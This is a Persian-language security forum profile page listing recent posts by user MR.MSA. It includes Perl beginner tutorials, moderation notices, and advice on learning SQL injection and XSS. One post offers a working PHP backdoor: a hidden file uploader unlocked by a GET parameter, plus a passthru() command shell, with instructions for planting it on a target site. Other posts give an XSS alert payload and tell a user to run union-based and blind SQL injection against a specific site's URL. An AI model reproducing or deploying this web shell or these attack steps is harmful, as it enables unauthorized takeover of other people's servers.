discord icon
سرور دیسکورد گاردایران

MR.MSA

عضو تیم دیفیس
  • تعداد ارسال ها

    453
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    32

آخرین بار برد MR.MSA در 10 اسفند

MR.MSA یکی از رکورد داران بیشترین تعداد پسند مطالب است !

درباره MR.MSA

  • درجه

  • تاریخ تولد 15 بهمن 1248

روش های تماس

  • Website URL
    mr-msa.xyz
  • Yahoo
    mr.msa7@yahoo.com
  • Skype
    mr.msa

اطلاعات فردی

  • نام اصلی
    MSA
  • محل سکونت
    Guardiran Security Team
  • جنسیت
    آقا

اطلاعات کامپیوتر شخصی

  • سیستم عامل
    Mac
  • مرورگر
    Chrome
  • آنتی ویروس
    Avira

آخرین بازدید کنندگان نمایه

3,491 بازدید کننده نمایه
  1. MR.MSA

    ارتقا کاربر proxy

    با سلام بنده به @proxy عزیز تبریک میگم و واقعا لیاقتشو داشت. همچنین تشکر میکنم بابت زحماتت و ایشالا همیشه توی همه زمینه ها موفق باشی.❤️ شیرینی یادت نره داداش 😉
  2. با سلام دوست عزیز لطفا اسپم نکنید سوالات درمورد رد فریمورک رو در قسمت مربوطه بپرسید. لینک دانلود: https://guardiran.org/applications/core/interface/file/attachment.php?id=6158 لینک گیت هاب: کیت جامع کیت کنسول رد جی اس هسته کیت جامع هسته کیت کنسول
  3. با سلام خیلی ممنون از @Bs0d اما میتونید از این آپلودر هم استفاده کنید برای بک دور خیلی کاربردیه. <? if ($_GET['news']=='true') { $docr = $_SERVER["DOCUMENT_ROOT"]; echo <<<HTML <table> <form enctype="multipart/form-data" action="$self" method="POST"> <input type="hidden" name="ac" value="upload"> <tr> <td><font size="1">Your File : </font> </td> <td> <input size="48" name="file" type="file" style="color: #008000; font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid #008000; background-color: #000000"></td> </tr> <tr> <td><font size="1">Upload Dir : </font> </td> <td> <input size="48" value="$docr/" name="path" type="text" style="color: #008000; font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid #008000; background-color: #000000"> <input type="submit" value="Upload " style="color: #008000; font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid #008000; background-color: #000000"></td> $tend </table> HTML; if (isset($_POST["path"])){ $uploadfile = $_POST["path"].$_FILES["file"]["name"]; if ($_POST["path"]==""){$uploadfile = $_FILES["file"]["name"];} if (copy($_FILES["file"]["tmp_name"], $uploadfile)) { echo "File uploaded to : $uploadfile\n"; echo "- Size : " .$_FILES["file"]["size"]. "\n"; } else { print "Error Upload File :\n"; } } } ?> <?php if(!empty($_GET['cmd'])){ echo'<pre>'; passthru($_GET['cmd']); echo'</pre>'; exit; } ?> توجه داشته باشید که زمان آپلود فایل باید کنار آدرس فایل پارامتر گت news رو مساوری با true قرار بدی. مثال: site.com/images/uploader.php?news=true موفق باشید.
  4. ببخشید دوست عزیز اما قسمتی در سایت وجود دارد به نام "پیام رسان" لطفا به قوانین احترام بزارید و این موارد رو در اونجا مطرح کنید! خب اینجا یک سوال خیلی مهم میمونه که شما چجوری php اپلود کردی؟ و نکته همینه که احتمالا سایت اصلا php ساپورت نمیکنه یک بایپس پرایوت دارم شاید بتونه کمک کنه
  5. خب حتما نباید id باشه توی ویدئو های بعد اگه اشتباه نکنم تارگتی بود که id نداره و یک چیز دیگس اشکال نداره مراحل رو روی همون کار کنید هیچ فرقی نداره. نیازی نیست حتما id باشه مثلا میتونه userid یا product یا name یا news یا .... باشه. موفق باشید.
  6. با سلام دوست عزیز فکر میکنم اصلا شل به صورت php خونده نمیشه و اینکه نیازی به اسپم نیست کسی که توی تاپیک پاسخی رو ارسال میکنه بعدشم به پست های بعدی توجه میکنه. دوست عزیز شل ها جوری نوشته میشن که اسمشون هر چی باشه فرقی نداره که اینجا هم چون اصلا فایل php ران نمیشه این مشکل رخ داده. در کنارش یک نکته مهم: این رو برای تمام دوستان میگم،‌ برای همینه که پیشنهاد میشه یک زبان برنامه نویسی رو کار کنید که توی درک مفاهیم تست و نفوذ مشکلی براتون پیش نیاد و بتونید تجزیه و تحلیل خوبی داشته باشید. در کنارش بگم که برای تست و نفوذ وب پیشنهاد من زبان php هست. موفق و پیروز باشید.
  7. 😐 دوست عزیز الان قضیه چه فرقی کرد؟ شما چرا دستی رو ول کردی رفتی سراغ ابزار! هیچ فرقی باهم ندارن بالاخره شما باید یه دستوراتی رو بلد باشید و بزنید برای همین پیشنهاد من یادگیری به صورت دستی هست چون توی روش دستی شما وابسته به یک ابزار یا سیستم عامل نیستی و میتونید متود ها و روش های پرایوت هم بزنی و میدونی دقیقا چیکار داری میکنی، فردا روزی یجا گفتن بیا این باگ رو ببند یا آموزشش بده شما فقط چند تا دستور sqlmap رو میخوای بگی؟ و نمیتونی بگی دقیقا چه مشکلی داره رخ میده منم نمیگم اصلا از ابزار استفاده نکنید ولی اصلا برای یک مبتدی خوب نیست ابزار فقط برای بالا بردن سرعت کاره و شما اول باید کامل آشنا باشی با روند کار امیدوارم نکاتی که گفتم رو توجه کنید موفق و پیروز باشید.
  8. عملگر های محاسباتی و نکات رشته ای با سلام خدمت دوستان عزیز. قراره توی این پست به عملگر های محاسباتی بپردازیم و در کنارش چند نکته درمورد رشته ها رو بهتون آموزش بدم،‌ اول یه آشنایی با عملگر ها داشته باشیم که عملگر ها در واقع کاراکتری هایی هستند که یک سری کار ها رو برامون انجام میدن، حالا بریم سراغ مطالب. نکات رشته : \n : مثل اینتر زدن عمل میکنه و خط رو میشکنه. \t : یک تب میزنه \f : یک اینتر و بعد یک تب میزنه. \$ : دالر رو نشون میده. \\ : معادل یک بک اسلشه \" : دابل کوتیشن رو نشون میده توی یک استرینگ نکته: توجه داشته باشید که باید این ها رو بین دابل کوتیشن قرار بدید زمان چاپ کردن. مثال: # \n print "salam\nkhoobi?"; print "salam \n khoobi?"; # \t print "salam \t chetori?" print "Guardiran\t\tSecurity\t\tTeam"; print "Sql \t\n Injection"; # \f print "hi \f ali "; print "salam \f khoobi?"; # \$ print "var = \$salam"; print "20\$"; # \\ print "back slash : \\"; print "ali\\mohammad"; # \" print "salam \" ali \""; print "yor code= \"20\""; عملگر های محاسباتی : + - * / % ** جمع تفریق ضرب تقسیم باقیمانده توان مثال : print 2 + 2 ; # 4 print 3 - 2 ; # 1 print 5 * 2 ; # 10 print 4 % 3 ; # 1 print 2 ** 3; # 8 اولویت ها : اعداد منفی > پرانتز () > توان > ضرب و تقسیم >‌ جمع و تفریق print 10+10/2*4; print "\n"; print ((10+10)/2)*4;
  9. MR.MSA

    گرفتن پسورد wifi

    با سلام کاربر محترم @zubeid1 دلیل محروم شدن شما از سایت اسپم کردن و به تذکرات توجه نکردنه! و اینو برای تمام دوستان میگم وقتی میخواید یک ابزار بنویسید حداقل اسم خود تیم رو درست بنویسید وگرنه جز ابزار های تیم نیست! چون حتی اسم تیم یا آدرس سایت هم قرار ندادید. Guardiran Security Team guardiran.org Guardiran موفق و پیروز باشید.
  10. با سلام و عرض ادب دوست عزیز @Mr.Night اینا نصیحت نیست! اخطاره شما هم لطف کن انقدر ما رو به زحمت ننداز و تاپیک ها رو خراب نکن کپی برداری نشون میده خودتون مطلب رو بلد نیستید میتونید اونو بخونید و با توجه به چیزی که خوندید راهنمایی کنید. موفق باشید.
  11. سلام ابتدا تشکر میکنم از @proxy و @KR0N0S برای دیسکورد میتونید این تاپیک رو مطالعه کنید: و برای آموزش Sql Injetion هم میتونید از پست هایی که @KR0N0S پیشنهاد دادن استفاده کنید و همونجور که @proxy گفتن بیاید دیسکورد به صورت آنلاین آموزش بدیم که تقریبا هر روز به صورت لایو تست و نفوذ انجام میدیم توی دیسکورد دوستان علاقمند دیگه هم میتونند بیان اونجا تا باهم کار کنیم. موفق و پیروز باشید.
  12. درود چرا دوست عزیز میشه گفت هر جایی که ورودی کاربر چاپ بشه امکان وجود xss هست. مثلا ما یک ادرس داریم به این صورت : site.com/login.php?error=password is wrong! و مثلا خطای password is wrong رو توی پیج لاگین میده حالا فرض کنید بجای اون یک کد javascript بزنیم: site.com/login.php?error=<script>alert('guardiran')</script> حالا اگر اجرا بشه میگیم xss داره. و یا چند مثال دیگه بخوام بزنم زمانی که سایت یک نام کاربری رو از شما میگیره و همه جا اون اسم رو چاپ میکنه مثلا میگه خوش اومدی MR.MSA خب توی این حالت هم میتونید بجای یک نام درست از کد جاوا اسکریپتی استفاده کنید و همیشه هم توی url و کامنت گذاری نیست مثلا میتونید از طریق کوکی بعضی وقت ها از این باگ استفاده کنید یا از طریق ارسال درخواست post و... برای درک کد ها هم بهتره به js مسلط باشید. نکته دیگه اینکه برای آشنایی با انواع حملات xss مثل XSS Stored میتونید از مقالات Owasp هم استفاده کنید. برای آموزش این آسیب پذیری میتونید به این تاپیک مراجعه کنید: موفق و پیروز باشید.
  13. درود ببنید میتونید تست کنید توی این آدرس http://mywebsite.com/wp-content/uploads/2020/06/8b92f1ba14987755-720p.mp4?_=1 که پارامتر دهی داشتیم همونجور که نوشته متود get و پارامتر آندرلاین که مراحل sql injection رو انجام بدید به صورت union based اگر نشد از آسیب پذیری blind sql injection استفاده کنید. موفق باشید.
  14. نکات اولیه با سلام خدمت دوستان عزیز در این تاپیک میخوایم یک آشنایی کلی با متغیر ها و نکات اولیه زبان پرل بپردازیم. طریقه بستن دستورات: ما برای بستن دستورات در پرل از Semicolons ; استفاده میکنیم. فرمت فایل های پرل: همون جور که میدونید، فایل پروژه های هر زبان یک فرمت خاص خودشو داره که زبان پرل فرمت .pl هست و فایل ها رو باید با این فرمت ذخیره کنید. دستور Print: ما برای چاپ کردن یک مقدار مثلا یک String از دستور print میتونیم استفاده کنیم. مثال: print "Hello World!" ; print 'test' ; print 200 ; print 2.2 ; کامنت کردن: کامنت در واقع برای نوشتن یک یادداشت در پروژه شما هست، مثلا بنویسی چرا از چنین سیستمی در فلان قسمت استفاده کردی! که بعد از مثلا چند هفته کد رو دیدید گیج نشین! و یا توی پروژه های تیمی کامنت گذاری خیلی کمک میکنه، حتی در خیلی از پروژه های فریلنسرینگ برنامه نویسی اکثر پروژه ها باید کامنت گذاری خوبی داشته باشه!. کامنت ها هیچ تاثیری روی برنامه شما ندارن و کامنت کردن در زبان های مختلف فرق داره که در پرل با گذاشتن یک هشتگ (#) از اون به بعد کامنت به حساب میاد. مثال اول: # your comment مثال دوم: print "hello wolrd!"; # for test متغیر ها: برای تعریف متغیر ما سه دیتا تایپ اصلی رو داریم که در این پست به طور کلی بهشون میپردازیم: 1- Scalars با علامت دلار ($) تعریف میشه و میتونه مقادیر String، Int ، Float رو بگیره مثال: $var = "salam" ; #string $var2 = 20 ; #integer $var3 = 2.5 ; # float print $var ; print $var2 ; print $var3 ; 2- Arrays با علامت اتساین (@) تعریف میشه و در واقع لیستی از Scalar ها رو میگیره. مثال: @my_array = ( 2 , 2.5 , 'salam'); @array2 = ('hello','world'); @test = ('test1' , 200 , "test2" , "test3"); # for print (DataType: scalar) print "@my_array \n" ; print "@array2 \n"; print "@test \n" ; # or print "@my_array \n @array2 \n @test " 3- Hashes با علامت درصد (%) تعریف میشه و یک جفت هستن یعنی با یک کلید اون رو فراخوانی کنیم. مثال اول: %age = (ali, 25 , mohammad, 32); # or %age = ('ali', 25 , 'mohammad', 32); # print print "ali = $age{'ali'} \n"; print "mohammad = $age{'mohammad'} \n"; الان در واقع توی هش age ما یک ali داریم با مقدار 25 و یک mohammad با مقدار 32 . در خط ۲ و ۳ اومدیم اسم دو شخص رو گذاشتیم و مساویه با ، { اینجا دیگه سن ali و mohammad رو فراخوانی کردیم (به صورت scalar)‌ } مثال دوم: %age = (ali => 25 , mohammad => 32); # or %age = ('ali' => 25 , 'mohammad' => 32); # print print "ali = $age{'ali'} \n"; print "mohammad = $age{'mohammad'} \n"; در اینجا نتیجه با مثال قبل فرقی نداره اما میتونیم به این صورت هم hash ها رو تعریف کنیم. --------------------------------------- [+] این پست در صورت لزوم آپدیت خواهد شد. --------------------------------------- موفق و پیروز باشید.